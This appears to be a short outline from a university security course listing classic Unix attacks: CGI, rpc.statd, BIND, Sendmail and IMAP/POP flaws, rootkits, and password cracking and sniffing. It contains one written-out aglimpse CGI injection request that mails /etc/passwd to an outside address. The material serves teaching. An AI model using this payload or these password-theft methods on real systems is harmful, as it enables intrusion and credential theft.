• Aglimpse - CGI exploit that allows execution of arbitrary commands
  • CGI program that uses glimpse to search

>telnet 10.0.0.25 Trying 10.0.0.25 Connected to hackedhost.org Escape character is '^]' GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5user\@mysite.com\</etc/passwd;eval$CMD;echo

• RPC.STATD - using the syslog() function, a remote user can execute code as root on the victim's machine [Input Validation Problem in rpc.statd]
• BIND (Berkeley Internet Name Domain) Weaknesses
• Sendmail buffer overflow
• IMAP and POP Buffer Overflow or Incorrect Implementation
• Rootkits
  • Analysis of rootkit
  • knark
  • TrojanIT
• Passwords
  • Crack
  • John the Ripper
  • Obtaining passwords
    • Sniffing the passwords off the network
    • Obtain a copy from /etc/passwd (if not shadowed)
    • Obtaining a copy from a tape or emergency repair disk

Please mail any comments about this page to wsummers@cs.nmhu.edu